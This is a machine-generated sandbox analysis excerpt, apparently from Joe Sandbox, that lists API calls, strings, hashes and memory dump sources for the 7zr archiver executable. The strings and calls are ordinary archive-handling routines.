                          • Instruction Fuzzy Hash: E5717035600701EFDB24FFA1D895BEABBA6AF54300F14843DE95A87251CB70AD45CF91
                          APIs
                          • __EH_prolog.LIBCMT ref: 0018A091
                            • Part of subcall function 00189BAA: RegCloseKey.ADVAPI32(?,?,00189BA0), ref: 00189BB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CloseH_prolog
                          • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
                          • API String ID: 1579395594-270022386
                          • Opcode ID: 643e065fadab545d66f62cae499f0d74275eda3b498a34aca89ef6873d70ef8b
                          • Instruction ID: b2016f8a48e4065f0a01a5b914d898e89904d9eeec12eb17260c76f0b8d6b65b
                          • Opcode Fuzzy Hash: 643e065fadab545d66f62cae499f0d74275eda3b498a34aca89ef6873d70ef8b
                          • Instruction Fuzzy Hash: 3551B171E00205AFDF11FF98D8969AEB7B5BF69300F90442EE512A7241DB30AB05CF92
                          APIs
                          • __EH_prolog.LIBCMT ref: 001DC453
                            • Part of subcall function 001DC1DF: __EH_prolog.LIBCMT ref: 001DC1E4
                            • Part of subcall function 001DC543: __EH_prolog.LIBCMT ref: 001DC548
                            • Part of subcall function 00181E0C: malloc.MSVCRT ref: 00181E1F
                            • Part of subcall function 00181E0C: _CxxThrowException.MSVCRT(?,00234B28), ref: 00181E39
                          Strings
                          Similarity
                          • API ID: H_prolog$ExceptionThrowmalloc
                          • String ID: ((#$<(#$L(#$\(#
                          • API String ID: 3744649731-2556618110
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B46D4
                          • EnterCriticalSection.KERNEL32(00242918), ref: 001B46E8
                          • CompareFileTime.KERNEL32(?,?), ref: 001B4712
                          • LeaveCriticalSection.KERNEL32(00242918), ref: 001B476A
                          Strings
                          Similarity
                          • API ID: CriticalSection$CompareEnterFileH_prologLeaveTime
                          • String ID: v
                          • API String ID: 3800395459-3261393531
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B4642
                          • EnterCriticalSection.KERNEL32(00242918), ref: 001B4656
                          • LeaveCriticalSection.KERNEL32(00242918), ref: 001B4685
                          • LeaveCriticalSection.KERNEL32(00242918), ref: 001B46C5
                          Strings
                          Similarity
                          • API ID: CriticalSection$Leave$EnterH_prolog
                          • String ID: v
                          • API String ID: 2532973370-3261393531
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B602A
                          • EnterCriticalSection.KERNEL32(00242938), ref: 001B6044
                          • LeaveCriticalSection.KERNEL32(00242938), ref: 001B6060
                          Strings
                          Similarity
                          • API ID: CriticalSection$EnterH_prologLeave
                          • String ID: v$8)$
                          • API String ID: 367238759-815355827
                          APIs
                          Similarity
                          • API ID: wcscmp$ExceptionH_prologThrow
                          • String ID:
                          • API String ID: 2750596395-0
                          APIs
                          • memset.MSVCRT ref: 001E03F5
                          • memcpy.MSVCRT(?,?,00000008,00000064,?,?,?,?,00000064), ref: 001E0490
                          • memset.MSVCRT ref: 001E0618
                          Strings
                          Similarity
                          • API ID: memset$memcpy
                          • String ID: $@
                          • API String ID: 368790112-1077428164
                          APIs
                            • Part of subcall function 00212FB0: EnterCriticalSection.KERNEL32(?,?,?,00212749), ref: 00212FB8
                            • Part of subcall function 00212FB0: LeaveCriticalSection.KERNEL32(?,?,?,00212749), ref: 00212FC2
                          • EnterCriticalSection.KERNEL32(?), ref: 0021290E
                          • LeaveCriticalSection.KERNEL32(?), ref: 00212928
                          • EnterCriticalSection.KERNEL32(?), ref: 00212992
                          • LeaveCriticalSection.KERNEL32(?), ref: 002129B8
                          • EnterCriticalSection.KERNEL32(?), ref: 00212A1E
                          • LeaveCriticalSection.KERNEL32(?), ref: 00212A56
                          Strings
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID: v
                          • API String ID: 3168844106-3261393531
                          APIs
                          • __EH_prolog.LIBCMT ref: 00186141
                            • Part of subcall function 00186C72: __EH_prolog.LIBCMT ref: 00186C77
                          • SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 00186197
                          • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 0018626E
                          • SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 001862A9
                            • Part of subcall function 00186096: __EH_prolog.LIBCMT ref: 0018609B
                            • Part of subcall function 00186096: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 001860DF
                          • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 00186285
                          Similarity
                          • API ID: ErrorLast$H_prolog$DeleteFile
                          • String ID:
                          • API String ID: 3586524497-0
                          APIs
                          • memcmp.MSVCRT(?,002348A0,00000010), ref: 001944DB
                          • memcmp.MSVCRT(?,00230128,00000010), ref: 001944EE
                          • memcmp.MSVCRT(?,00230228,00000010), ref: 0019450B
                          • memcmp.MSVCRT(?,00230248,00000010), ref: 00194528
                          • memcmp.MSVCRT(?,002301C8,00000010), ref: 00194545
                          Similarity
                          • API ID: memcmp
                          • String ID:
                          • API String ID: 1475443563-0
                          APIs
                          • memcmp.MSVCRT(?,002348A0,00000010), ref: 001E672A
                          • memcmp.MSVCRT(?,00230258,00000010), ref: 001E6747
                          • memcmp.MSVCRT(?,002302D8,00000010), ref: 001E675A
                          Similarity
                          • API ID: memcmp
                          • String ID:
                          • API String ID: 1475443563-0
                          APIs
                          • memcmp.MSVCRT(?,002348A0,00000010), ref: 001A89D5
                          • memcmp.MSVCRT(?,00230258,00000010), ref: 001A89F2
                          • memcmp.MSVCRT(?,00230328,00000010), ref: 001A8A05
                          Similarity
                          • API ID: memcmp
                          • String ID:
                          • API String ID: 1475443563-0
                          APIs
                          • __EH_prolog.LIBCMT ref: 001EA8B9
                            • Part of subcall function 0018965D: VariantClear.OLEAUT32(?), ref: 0018967F
                          Strings
                          Similarity
                          • API ID: ClearH_prologVariant
                          • String ID: ZIP$exe$zip
                          • API String ID: 1166855276-1635144978
                          APIs
                          Strings
                          Similarity
                          • API ID: H_prolog
                          • String ID: !$LZMA2:$LZMA:
                          • API String ID: 3519838083-3332058968
                          APIs
                          • __EH_prolog.LIBCMT ref: 00192AAE
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00192BC1
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00192BDF
                            • Part of subcall function 00192BF5: __EH_prolog.LIBCMT ref: 00192BFA
                            • Part of subcall function 00192BF5: _CxxThrowException.MSVCRT(?,00236010), ref: 00192C9E
                          Strings
                          • There is no second file name for rename pair:, xrefs: 00192BAE
                          Similarity
                          • API ID: ExceptionThrow$H_prolog
                          • String ID: There is no second file name for rename pair:
                          • API String ID: 206451386-3412818124
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A6B88
                            • Part of subcall function 001C04D2: _CxxThrowException.MSVCRT(?,00234A58), ref: 001C04F8
                            • Part of subcall function 00181524: __EH_prolog.LIBCMT ref: 00181529
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                            • Part of subcall function 00183599: memmove.MSVCRT(00000002,?,?,?,00000001,?,0018904C,00000001,00000002,00000000,00000000,?,?,?,00188EC4,?), ref: 001835D5
                          Strings
                          Similarity
                          • API ID: H_prolog$ExceptionThrowfreememmove
                          • String ID: crc$flags$memuse
                          • API String ID: 2665131394-339511674
                          APIs
                          • __EH_prolog.LIBCMT ref: 0018A389
                            • Part of subcall function 0018A4C5: GetModuleHandleW.KERNEL32(ntdll.dll,?,0018A3C1,00000001), ref: 0018A4CD
                            • Part of subcall function 0018A4C5: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0018A4DD
                          Strings
                          Similarity
                          • API ID: AddressH_prologHandleModuleProc
                          • String ID: : $ SP:$Windows
                          • API String ID: 786088110-3655538264
                          APIs
                          • __EH_prolog.LIBCMT ref: 001907E0
                          • EnterCriticalSection.KERNEL32(?), ref: 001907F2
                          • LeaveCriticalSection.KERNEL32(?), ref: 0019086B
                          Strings
                          Similarity
                          • API ID: CriticalSection$EnterH_prologLeave
                          • String ID: v
                          • API String ID: 367238759-3261393531
                          APIs
                          • __EH_prolog.LIBCMT ref: 00192BFA
                            • Part of subcall function 00193AF1: __EH_prolog.LIBCMT ref: 00193AF6
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00192C9E
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionThrow
                          • String ID: -r0$Unsupported rename command:
                          • API String ID: 2366012087-1002762148
                          APIs
                          • __EH_prolog.LIBCMT ref: 001906FB
                          • EnterCriticalSection.KERNEL32(?), ref: 0019070B
                          • LeaveCriticalSection.KERNEL32(?,?), ref: 00190786
                            • Part of subcall function 0019089E: _CxxThrowException.MSVCRT(?,00234A58), ref: 001908C4
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterExceptionH_prologLeaveThrow
                          • String ID: v
                          • API String ID: 4150843469-3261393531
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,0018A3C1,00000001), ref: 0018A4CD
                          • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0018A4DD
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: RtlGetVersion$ntdll.dll
                          • API String ID: 1646373207-1489217083
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetLargePageMinimum,00191D26), ref: 00206A6A
                          • GetProcAddress.KERNEL32(00000000), ref: 00206A71
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetLargePageMinimum$kernel32.dll
                          • API String ID: 1646373207-2515562745
                          APIs
                          • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 001A0359
                          • GetLastError.KERNEL32(?,?,00000000,?), ref: 001A0382
                          • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 001A03DA
                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 001A03F0
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ErrorFileLastSecurity
                          • String ID:
                          • API String ID: 555121230-0
                          APIs
                          • __EH_prolog.LIBCMT ref: 00188300
                          • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 0018834F
                          • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 0018837C
                          • memcpy.MSVCRT(?,?,?,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 0018839B
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                          • String ID:
                          • API String ID: 1689166341-0
                          APIs
                          • wcscmp.MSVCRT ref: 001D8CC6
                          • __EH_prolog.LIBCMT ref: 001D88DD
                            • Part of subcall function 001D8E31: __EH_prolog.LIBCMT ref: 001D8E36
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$wcscmp
                          • String ID: Can't open volume:
                          • API String ID: 3232955128-72083580
                          APIs
                          • __EH_prolog.LIBCMT ref: 001EAAEA
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologfree
                          • String ID: EXE$exe
                          • API String ID: 1978129608-1088655240
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: @$crc
                          • API String ID: 3519838083-849529298
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: BlockPackSize$BlockUnpackSize
                          • API String ID: 3519838083-5494122
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologstrcmp
                          • String ID: =
                          • API String ID: 1490138475-2525689732
                          APIs
                          • __EH_prolog.LIBCMT ref: 0018A4F8
                            • Part of subcall function 0018A384: __EH_prolog.LIBCMT ref: 0018A389
                            • Part of subcall function 00189E14: GetSystemInfo.KERNEL32(?), ref: 00189E36
                            • Part of subcall function 00189E14: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00189E50
                            • Part of subcall function 00189E14: GetProcAddress.KERNEL32(00000000), ref: 00189E57
                          • strcmp.MSVCRT ref: 0018A564
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                          • String ID: -
                          • API String ID: 2798778560-3695764949
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: __aulldivstrlen
                          • String ID: M
                          • API String ID: 1892184250-3664761504
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: 0$x
                          • API String ID: 3519838083-1948001322
                          Strings
                          • Cannot open the file as archive, xrefs: 001B86D0
                          • Cannot open encrypted archive. Wrong password?, xrefs: 001B8698
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs
                          • String ID: Cannot open encrypted archive. Wrong password?$Cannot open the file as archive
                          • API String ID: 1795875747-1623556331
                          APIs
                          • __EH_prolog.LIBCMT ref: 001E4039
                            • Part of subcall function 001E40BA: __EH_prolog.LIBCMT ref: 001E40BF
                            • Part of subcall function 001C5E2B: __EH_prolog.LIBCMT ref: 001C5E30
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: D.#$T.#
                          • API String ID: 3519838083-2070575581
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs
                          • String ID: =
                          • API String ID: 1795875747-2525689732
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$fputc
                          • String ID: `&$
                          • API String ID: 1185151155-1212904903
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs
                          • String ID: Unsupported Windows version$p&$
                          • API String ID: 1795875747-2843031858
                          APIs
                          • memcmp.MSVCRT(?,002348A0,00000010), ref: 001E41D6
                          • memcmp.MSVCRT(?,00230168,00000010), ref: 001E41F1
                          • memcmp.MSVCRT(?,002301E8,00000010), ref: 001E4205
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID:
                          • API String ID: 1475443563-0